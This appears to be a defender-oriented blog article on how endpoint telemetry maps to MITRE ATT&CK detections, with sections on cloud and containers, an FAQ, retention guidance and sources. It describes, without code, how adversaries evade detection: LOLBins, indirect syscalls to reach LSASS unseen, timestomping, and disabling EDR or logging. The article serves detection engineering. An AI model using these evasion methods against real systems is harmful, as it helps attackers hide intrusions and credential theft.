ATT&CK coverage on paper does not mean an adversary will be caught. The framework describes what techniques produce detectable signals — but adversaries are aware of detection infrastructure and actively adapt to avoid tripping it. Understanding these adaptations is what separates detection programs that catch real intrusions from programs that perform well only in ATT&CK Evaluations scenarios.

Adversary Countermoves: When They Know You Are Collecting
1
Living-Off-the-Land (LOLBins)
Rather than dropping a custom binary that hashes to a known-malicious value, adversaries use legitimate system tools — certutil.exe, mshta.exe, regsvr32.exe, wmic.exe — to execute payloads. These processes are already in your environment, run under trusted parent processes, and their signatures won't fire a hash-based rule. They still produce process creation telemetry, but they require behavioral detection logic, not signature matching. This is why process creation with full command-line argument auditing is the non-negotiable baseline: the technique is in the command-line, not the binary.
2
Sysmon Event ID 10 Evasion
LSASS credential dumping detection (T1003.001) relies on Sysmon Event ID 10 firing when a process requests PROCESS_VM_READ access to lsass.exe. Adversaries increasingly use indirect system calls — bypassing the standard Win32 API layer where Sysmon hooks — to open LSASS handles without triggering user-mode telemetry. Countering this requires kernel-level telemetry from EDR drivers that operate below the Sysmon hook layer, not just user-space sensors. Organizations that deploy only Sysmon without a commercial EDR have a meaningful blind spot here.
3
Timestomping and Metadata Manipulation
ATT&CK T1070.006 (Timestomp) covers adversary modification of file timestamps to make malicious files appear older than they are — defeating timeline-based forensic analysis. Process metadata anomalies are similarly manipulated: masquerading (T1036) involves renaming malicious executables to match trusted system binary names. Detection requires comparing process image path against expected system directories, not just binary names — a field-level check that many SIEM rules omit.
4
Telemetry Infrastructure as the Target
Sophisticated adversaries attack the observation layer itself. T1562.001 (Impair Defenses: Disable or Modify Tools) documents this directly — killing EDR processes, deleting Sysmon configurations, or modifying Group Policy to disable Script Block Logging. Once the telemetry pipeline is impaired, subsequent technique execution becomes invisible. This is why monitoring for telemetry health — agent heartbeat, log volume anomalies, Event ID 1102 (audit log cleared) — must be part of the detection program. A SIEM receiving suddenly reduced telemetry from a host is itself an indicator of compromise.
Operational implication: ATT&CK coverage percentages measure whether you have detection logic for a technique assuming the telemetry is functioning. They do not measure whether that logic will fire when an adversary has actively adapted their behavior. Detection engineering must account for the adversary's knowledge of defensive tooling — not just the technique taxonomy.

Endpoint Telemetry in Cloud Workloads and Containers

The article so far has addressed telemetry in the context of traditional Windows, Linux, and macOS endpoints. But a growing share of enterprise infrastructure runs in cloud-native environments — ephemeral virtual machines, containerized workloads, and serverless functions — that behave differently from persistent endpoints in ways that create specific telemetry challenges against the ATT&CK matrix.

Cloud virtual machines running on AWS EC2, Azure Virtual Machines, or Google Compute Engine are, in principle, instrumentable with the same EDR agents and Sysmon-equivalent tooling as on-premises hosts. The challenge is operational: auto-scaling groups spin up and tear down instances without manual intervention, which means agent installation must be baked into machine images and telemetry pipelines must account for hosts that exist for minutes rather than months. ATT&CK techniques such as T1078 (Valid Accounts) are particularly common in cloud environments, but the signals they produce — authentication events from cloud identity providers like AWS IAM or Azure Entra ID — are not endpoint telemetry at all. They require cloud-native log sources (AWS CloudTrail, Azure Audit Logs) as a separate telemetry stream alongside endpoint agents on the instances themselves.

Containers present a more fundamental instrumentation challenge. A container shares the host kernel but does not expose the same event surfaces as a full operating system. A traditional EDR agent cannot be deployed inside a container image without significant overhead, and many container deployments are explicitly designed to be read-only and minimal. eBPF has emerged as the primary solution: eBPF-based sensors attached at the host kernel level observe all container activity — process creation, syscalls, network connections — without requiring an agent inside each container. MITRE has published ATT&CK for Containers coverage that maps techniques such as T1610 (Deploy Container) and T1611 (Escape to Host) to the specific telemetry sources relevant to containerized environments, including container orchestration audit logs from Kubernetes and host-level eBPF observations.

Ephemeral Workload Telemetry Gap

Telemetry from a container or short-lived cloud instance is only useful if it is streamed out to a persistent collection platform in real time. When a container terminates, any telemetry stored only in its local filesystem is gone. ATT&CK technique detection in cloud-native environments requires centralized telemetry pipelines that capture and retain events before the workload disappears.

The telemetry retention question also becomes acute in ephemeral environments. On a persistent workstation, EDR platforms typically buffer telemetry locally and forward to the SIEM continuously. On a container that lives for forty seconds, buffered-but-not-forwarded telemetry is permanently lost when the container exits. This forces organizations to design telemetry architectures where streaming export is a first-class requirement — not an afterthought — and to explicitly map ATT&CK technique detection requirements to the telemetry sources available in their specific hosting model before gaps appear during an incident.

Frequently Asked Questions

What is endpoint telemetry in cybersecurity?

Endpoint telemetry is the continuous stream of behavioral and state-change data produced by operating systems, security agents, and instrumented applications on individual hosts. It captures process creation with full command-line arguments, file system operations, registry modifications, network connections tied to specific processes, authentication events, and inter-process communication. Unlike traditional logging — which captures discrete events written explicitly to a log file — endpoint telemetry includes continuous sensor data from kernel-level hooks and in-memory observations. That distinction matters because living-off-the-land techniques are specifically designed to avoid producing log entries; telemetry coverage is what makes those techniques detectable.

How does MITRE ATT&CK use endpoint telemetry for detection?

Every technique in the MITRE ATT&CK Enterprise matrix maps to specific endpoint telemetry sources through the ATT&CK Data Sources taxonomy. Each technique entry prescribes which data source components — such as Process Creation, Network Connection Creation, or Registry Key Modification — produce detectable signals for that technique. ATT&CK v18 (October 2025) went further by replacing general detection notes with structured Detection Strategies and over 1,700 Analytics that explicitly link telemetry components to actionable detection logic. This makes ATT&CK function simultaneously as a threat catalog and a sensor requirements document: the framework now closes the implementation gap between "what telemetry to collect" and "how to write a detection against it."

What changed in ATT&CK v18 for defenders?

ATT&CK v18, released in October 2025, replaced the old single-sentence detection notes with two new structured objects: Detection Strategies and Analytics. Detection Strategies define the high-level behavioral approach to detecting a technique, independent of any specific platform. Analytics provide platform-specific, actionable detection logic with explicit references to the telemetry data components and log sources that feed them — over 1,700 analytics added across the Enterprise matrix. The v18 release also expanded platform coverage to include ESXi, reflecting documented adversary targeting of VMware hypervisor infrastructure in ransomware and persistent access campaigns. For telemetry architects, this creates a new instrumentation requirement: EDR agents inside virtual machines do not see host-level hypervisor activity, requiring native ESXi audit log collection as a separate telemetry stream.

Why do enterprise SIEMs miss most ATT&CK techniques?

CardinalOps' Fifth Annual State of SIEM Detection Risk Report (June 2025) — the largest such study ever conducted, drawing from 2.5 million total log sources and over 13,000 unique detection rules across Splunk, Microsoft Sentinel, IBM QRadar, CrowdStrike Logscale, and Google SecOps — found that enterprise SIEMs have detection logic for only 21 percent of ATT&CK techniques used by adversaries. The gap is not primarily a data availability problem: those SIEMs were already ingesting sufficient telemetry to potentially cover more than 90 percent of techniques. The causes are detection engineering gaps (telemetry collected but no rule written against it), misconfigured data sources, and approximately 13 percent of existing rules being non-functional due to missing log fields.

What is the difference between EDR and SIEM for ATT&CK coverage?

EDR and SIEM serve complementary roles in an ATT&CK-aligned detection program. EDR is the collection and real-time analysis layer: it ingests raw endpoint telemetry at high volume, tracks parent-child process relationships, and applies behavioral detections on the host in real time. SIEM is the correlation and investigation layer: it aggregates telemetry from EDR alongside identity, network, and cloud sources and applies detection logic that spans multiple data sources and extended time windows. Neither replaces the other. An EDR alert indicating a credential dumping attempt is only contextualizable as part of a broader campaign when the SIEM correlates it with identity anomalies, lateral movement indicators, and cloud API access patterns — data that crosses source boundaries no individual EDR sensor can see.

What is Sysmon and why does it matter for ATT&CK detection?

Sysmon is a free Microsoft Sysinternals tool that exposes Windows kernel telemetry as structured XML events consumable by SIEM platforms. Key event IDs for ATT&CK coverage include Event ID 1 (process creation with hash and command-line), Event ID 3 (network connections per process), Event ID 10 (process access — the primary signal for detecting LSASS credential dumping under T1003.001), and Event ID 25 (process tampering for detecting injection and hollowing techniques under T1055). As of late 2025, Microsoft has announced that Sysmon functionality will be delivered as a native optional Windows feature via Windows Update — removing the manual per-endpoint deployment burden that has historically produced inconsistent Sysmon coverage across enterprise fleets.

How does threat hunting use ATT&CK and endpoint telemetry?

Threat hunting is the proactive interrogation of endpoint telemetry to find adversary activity that automated detections missed. ATT&CK provides the hypothesis framework: a hunter starts with a technique, identifies the telemetry sources it produces, and queries for anomalies below automated alert thresholds. The PEAK Threat Hunting Framework formalizes this into three hunt types: Hypothesis-Driven (starting from ATT&CK technique hypotheses), Baseline (establishing normal behavior profiles to surface anomalies), and Intel-Driven (starting from threat intelligence about specific adversary TTPs). In all three types, endpoint telemetry is the raw material. An underappreciated dimension is the value of absence: if a process executed but produced no child process, no network connection, and no file write, that pattern — detectable only through comprehensive telemetry baselines — points to in-memory execution techniques like T1620 (Reflective Code Loading).

Which ATT&CK tactics are hardest to detect with endpoint telemetry?

Reconnaissance (TA0043) and Resource Development (TA0042) are hardest because they occur before the adversary touches the victim infrastructure — the activity is external and produces no endpoint artifacts until tool delivery. Defense Evasion (TA0005) presents a different challenge: it contains the largest number of techniques in the Enterprise matrix, and many sub-techniques directly target the telemetry collection infrastructure itself — killing EDR agents, clearing event logs, or masquerading as legitimate processes. Detection here depends on telemetry that captures what was removed or altered, requiring baselining and alerting on absence as well as presence of events.

What endpoint telemetry should organizations prioritize collecting first?

The most operationally defensible approach is to align collection priorities with ATT&CK technique frequency in threat intelligence relevant to your sector. That said, there is a practical starting sequence that holds across most enterprise environments. Process creation with full command-line arguments — enabled through Windows Audit Process Creation and supplemented by Sysmon Event ID 1 — covers more ATT&CK techniques per data source than any other single telemetry type and should be the first configuration priority. PowerShell Script Block Logging (Event ID 4104) comes next because it is commonly disabled by default and covers the most-abused execution technique in the ATT&CK matrix. Process access telemetry from Sysmon Event ID 10 addresses credential dumping across T1003 sub-techniques. Network connection events tied to specific processes — not just IP flow records — close the lateral movement detection gap. From there, Authentication and Directory Service events on domain controllers address the highest-value ATT&CK techniques in the Credential Access and Persistence tactics. Organizations should use the ATT&CK Data Sources page and the ATT&CK v18 Analytics as a prioritization matrix: each analytic identifies exactly which data components are required, making it possible to rank missing telemetry by the number of high-frequency ATT&CK techniques that depend on it.

How long should endpoint telemetry be retained for ATT&CK-aligned detection?

Retention requirements for endpoint telemetry are driven by dwell time — the gap between initial compromise and detection. Industry reporting consistently shows median dwell times in breached organizations ranging from weeks to months. The implication is that a 30-day hot retention window in the SIEM, which is common in organizations managing storage costs, will contain no telemetry from the initial intrusion phase when detection finally occurs.

Why a 30-Day Hot Window Fails: Dwell Time vs. Retention Window
Intrusion
Dwell / Lateral Movement
Detection
30-day hot window
Day 0
Day 30
Day 60+
Day 90+
Day 0: Initial compromise — phishing email opened, payload executed, C2 established. This telemetry is the forensic ground truth for the intrusion.
Days 1–60+: Adversary moves laterally, escalates privileges, establishes persistence, stages data. Median enterprise dwell time in reported breaches exceeds 30 days.
Detection event: Alert fires — ransomware staging, unusual exfiltration, or an EDR behavioral rule trips. Investigation begins.
The gap: With a 30-day hot window, the initial intrusion telemetry has already been purged by the time detection occurs. Incident responders cannot reconstruct the initial access vector, the patient-zero endpoint, or the credential path used for lateral movement. The investigation starts in the middle of the story, not the beginning.

CISA's Cybersecurity Performance Goals recommend retaining logs for at least 12 months with three months immediately accessible for active analysis. For ATT&CK alignment specifically: techniques such as T1078 (Valid Accounts) rely on behavioral baselines that require weeks of normal activity to establish. Detecting Kerberoasting anomalies under T1558.003 requires comparing current ticket request patterns against historical baselines that only exist if telemetry has been retained long enough to establish them. The practical architecture for most organizations is tiered: 30 to 90 days of high-fidelity raw telemetry in a hot query tier, and 12 months of compressed or summarized telemetry in a cold archive accessible for retrospective investigation. The specific retention period for raw process creation events will differ from what is required for authentication events, which tend to be lower volume and higher signal density — and retention policy should reflect those differences rather than applying a single uniform window across all telemetry types.

Can endpoint telemetry detect insider threats and fileless attacks?

Yes to both, with important nuances. Fileless attacks — adversary techniques designed to execute entirely in memory without writing persistent artifacts to disk — are well represented in ATT&CK under T1620 (Reflective Code Loading), T1055 sub-techniques for process injection, and T1059 sub-techniques for scripting engine abuse. The key is that fileless does not mean telemetry-less. Reflective loading produces OS API execution telemetry. Process injection produces process access events (Sysmon Event ID 10) and process tampering events (Sysmon Event ID 25). PowerShell-based fileless execution produces Script Block Logging events. The common failure mode is organizations that have these telemetry sources available but have not written detection logic against them — exactly the gap the CardinalOps research quantified. For insider threats, endpoint telemetry surfaces behavioral anomalies that signature-based tools cannot: a legitimate user account accessing file shares they have never accessed before, staging data in unusual directories before transfer, or running reconnaissance commands that are technically authorized but behaviorally abnormal. ATT&CK does not have a dedicated Insider Threat tactic, but techniques like T1078 (Valid Accounts), T1074 (Data Staged), T1567 (Exfiltration Over Web Service), and T1213 (Data from Information Repositories) are the primary ATT&CK entries that map to insider threat behavior — and all are detectable through endpoint and identity telemetry when behavioral baselines are established.

Does endpoint telemetry work the same way in cloud workloads and containers?

No — and understanding the differences is increasingly important as infrastructure shifts toward cloud-native deployment models. Cloud virtual machines can run traditional EDR agents and Sysmon-equivalent tooling, but they require agent deployment baked into machine images to handle auto-scaling and ephemeral instance lifecycles. The larger gap is that many high-frequency ATT&CK techniques in cloud environments — particularly under the Valid Accounts (T1078) and Cloud Infrastructure Discovery (T1580) families — produce signals in cloud identity and API audit logs (AWS CloudTrail, Azure Audit Logs, GCP Cloud Audit Logs) rather than on the endpoint itself. These are fundamentally different telemetry streams that must be collected and correlated alongside endpoint data. Containers present the hardest instrumentation challenge: a container shares the host kernel but does not support agent-based telemetry collection inside the container image without unacceptable overhead. eBPF-based sensors at the host kernel level have become the dominant solution, observing container process activity, network connections, and syscalls without requiring per-container agents. ATT&CK for Containers, maintained as part of the broader ATT&CK Enterprise matrix, maps techniques like T1610 (Deploy Container) and T1611 (Escape to Host) to telemetry sources including container orchestration audit logs and host-level behavioral telemetry — providing a structured starting point for defenders building detection coverage in containerized environments.

Key Takeaways

  1. ATT&CK is also a sensor requirements document — and now a detection engineering document. Every technique entry includes data source mappings prescribing what telemetry must be operational to detect that technique. The ATT&CK v18 release (October 2025) went further, replacing vague detection notes with structured Detection Strategies and over 1,700 Analytics that explicitly link telemetry components to actionable detection logic. Using ATT&CK only as a threat catalog now leaves two of its most operationally useful dimensions unused.
  2. Telemetry configuration matters as much as telemetry collection. PowerShell Script Block Logging, process command-line argument auditing, and Sysmon Event ID coverage for process access and process tampering are commonly unconfigured in enterprise deployments, creating blind spots for some of the highest-frequency ATT&CK techniques.
  3. Server telemetry is not optional. Domain controllers, file servers, and database hosts are where post-compromise activity concentrates. ATT&CK coverage gaps on these systems represent the most operationally consequential instrumentation failures in most enterprise security programs.
  4. The SIEM alone cannot do it. EDR and SIEM serve different functions in the telemetry pipeline. EDR provides real-time behavioral analysis on the host. SIEM provides cross-source correlation across extended time windows. Both are required for coverage of the full ATT&CK matrix.
  5. Threat hunting closes the gap that automation cannot. Behavioral detections catch known patterns. Hunting interrogates telemetry for patterns not yet encoded in rules. ATT&CK technique hypotheses give hunters a structured starting point grounded in real adversary behavior rather than intuition alone.
  6. Retention and infrastructure model are telemetry decisions, not storage decisions. Detecting adversary dwell time of weeks or months requires telemetry retained long enough to contain the initial intrusion. Cloud and containerized workloads require architecture-specific instrumentation — eBPF at the host kernel for containers, cloud API audit logs alongside endpoint agents for cloud VMs — because the telemetry surfaces differ fundamentally from traditional endpoints. ATT&CK coverage in hybrid environments is only as complete as the narrowest instrumented tier.
  7. ATT&CK coverage percentages measure detection logic, not adversary detectability. Sophisticated adversaries adapt to known defensive tooling — using indirect syscalls to bypass Sysmon hooks, LOLBins to avoid hash-based detections, and targeting the telemetry infrastructure itself through T1562.001. A detection engineering program that treats ATT&CK coverage as the goal rather than a measurement instrument will be outpaced by adversaries who study the same framework. The coverage percentage is useful for identifying gaps; closing those gaps requires detection logic designed to be resilient to active evasion, not just technique presence.

The relationship between endpoint telemetry and MITRE ATT&CK is not incidental. It reflects a fundamental property of the operating environment: adversaries must interact with the operating system to accomplish their objectives, and those interactions produce observable artifacts. The framework's value to defenders is precisely that it translates observed adversary behavior into a structured map of detectable signals. Organizations that build their telemetry infrastructure around that map — rather than treating telemetry collection as a generic compliance requirement — are the ones positioned to find intrusions in hours rather than months.

Sources

  1. MITRE Corporation. "MITRE ATT&CK: Design and Philosophy." Version 1.0. attack.mitre.org
  2. MITRE ATT&CK. "Enterprise Matrix v18." October 2025. attack.mitre.org/matrices/enterprise
  3. MITRE ATT&CK. "ATT&CK v18 Release Notes." October 2025. attack.mitre.org/resources/updates
  4. Robertson, Amy L. "ATT&CK v18: The Detection Overhaul You've Been Waiting For." MITRE ATT&CK Blog, October 2025. medium.com/mitre-attack
  5. MITRE ATT&CK. "Data Sources." attack.mitre.org/datasources
  6. Microsoft Sysinternals. "Sysmon v15 Event Reference." learn.microsoft.com
  7. Microsoft. "Native Sysmon Functionality Coming to Windows." Windows IT Pro Blog, November 2025. techcommunity.microsoft.com
  8. CardinalOps. "Fifth Annual State of SIEM Detection Risk Report." June 2025. cardinalops.com
  9. MITRE ATT&CK Evaluations. "Enterprise Evaluations 2024 (Ransomware / DPRK macOS)." December 2024. attackevals.mitre.org/enterprise
  10. SigmaHQ. "Sigma Rules Repository." GitHub. github.com/SigmaHQ/sigma
  11. Splunk Security Research. "PEAK Threat Hunting Framework." 2023. splunk.com
  12. Microsoft. "Configure Advanced Audit Policy." Windows Security Event ID Reference. learn.microsoft.com
  13. Elastic. "Detection Rules Repository." GitHub. github.com/elastic/detection-rules
Back to all articles